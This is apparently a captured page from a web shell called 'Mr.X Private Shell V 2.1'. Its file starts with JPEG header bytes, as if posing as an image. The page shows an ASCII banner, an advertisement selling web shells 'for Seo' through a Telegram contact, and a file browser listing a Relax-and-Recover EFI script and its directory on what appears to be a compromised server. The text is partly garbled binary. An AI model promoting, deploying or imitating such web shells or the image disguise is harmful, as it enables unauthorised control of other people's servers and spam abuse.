����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# create_local_efi_dir.sh script # useful for testing the rescue boot procedure on local disk # instead of burning an ISO image to CD to boot from # Lives under /boot/efi/efi/rear # CREATE_LOCAL_EFI_DIR=true is set in usr/share/rear/conf/Linux-ia64.conf # but not mentioned in default.conf - nevertheless the user may set it to false: is_true $CREATE_LOCAL_EFI_DIR || return 0 test -d /boot/efi/efi/rear || mkdir -p /boot/efi/efi/rear cp $v $TMP_DIR/mnt/boot/* /boot/efi/efi/rear/ LogPrint "Populated local EFI boot directory /boot/efi/efi/rear (CREATE_LOCAL_EFI_DIR is true)"
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 200_mount_bootimg.sh | File | 600 B | 0644 |
|
| 300_create_bootimg.sh | File | 974 B | 0644 |
|
| 400_create_local_efi_dir.sh | File | 577 B | 0644 |
|
| 700_umount_bootimg.sh | File | 88 B | 0644 |
|
| 800_create_isofs.sh | File | 1.52 KB | 0644 |
|